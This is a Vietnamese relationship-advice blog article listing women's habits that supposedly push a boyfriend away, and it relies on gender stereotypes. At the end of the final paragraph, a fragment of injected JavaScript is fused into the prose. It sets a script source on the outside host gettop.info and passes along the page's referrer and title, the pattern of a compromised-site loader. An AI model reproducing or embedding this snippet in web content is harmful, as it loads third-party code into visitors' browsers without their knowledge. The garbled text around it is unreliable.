Những việc làm khiến chàng rời xa bạn

Thích “buôn chuyện”

“Buôn dưa lê” xưa nay vốn là bản tính trời cho của phụ nữ. Tuy nhiên, là một cô gái trưởng thành, bạn cần kiểm soát bản thân trong mọi hành vi và lời nói của mình. Có những câu chuyện, bạn cần đứng ngoài cuộc và có những bí mật, bạn tuyệt đối nên giữ cho riêng mình. Đàn ông thích những cô gái hoạt ngôn, nhưng họ lại khá dị ứng với những phụ nữ giỏi “ba hoa” và có thói quen đưa chuyện. Bởi mẫu phụ nữ này khiến họ cảm thấy không an toàn và khó lòng tin tưởng.

Thích sai vặt người yêu

Khi yêu, cô gái nào cũng muốn được nửa kia chiều chuộng và phục tùng. Kỳ thực, đây cũng là một sở thích của đàn ông, bởi họ luôn muốn thể hiện bản lĩnh nam nhi trước người phụ nữ của họ. Song, điều này không có nghĩa là, đàn ông thích trở thành “người hầu” bất đắc dĩ của người yêu.

Ra lệnh và sai vặt bạn trai làm việc này hay việc kia, nhất là trước mặt người khác, là cách nhanh nhất để phụ nữ đẩy người đàn ông mình yêu rời xa mình mãi mãi. Hãy nhớ, đàn ông rất trọng thể diện, họ không thể không nổi cáu khi bị biến thành cỗ máy phục vụ như thế.

uwvdwcpu_jpg0

Can thiệp vào các mối quan hệ của người yêu

Đây là thói quen thường gặp nhất của các cô nàng và cũng là việc làm khiến người đàn ông của họ không hài lòng nhất. Cho dù yêu anh ấy sâu đậm thế nào, bạn cũng không nên giữ tư tưởng sở hữu và kiểm soát. Thay vào đó, hãy cho bạn trai một khoảng không gian riêng tư, tôn trọng cuộc sống cá nhân và những mối quan hệ bạn bè của anh ấy.

Có thể, có những người bạn của người yêu khiến bạn không mấy thiện cảm, nhưng đừng vì thế mà ép buộc người yêu “nghỉ chơi” với họ. Quan trọng nhất là, đừng bao giờ ghen tuông vô cớ với những người bạn khác phái bình thường của anh ấy.

Yêu cầu bạn trai ở bên cạnh 24/24

Là con gái, ai cũng muốn ngày ngày được gặp mặt, quấn quýt bên người yêu. Nhưng thực tế cho thấy, việc này không chỉ ảnh hưởng đến cuộc sống cá nhân, công việc của hai người, mà còn khiến cho cả hai nhanh “chán” nhau hơn. Ép bạn trai kè kè ở cạnh từng giây từng phút, các cô gái đang biến tình yêu của mình trở thành địa ngục đối với nửa kia và đẩy hai người ngày càng xa nhau.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; .

2,361 lượt xem, 1 views todayTrả lời

Thư điện tử của bạn sẽ không được hiện thị công khai. Các trường bắt buộc được đánh dấu *

Bạn có thể sử dụng các thẻ HTML và thuộc tính sau: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>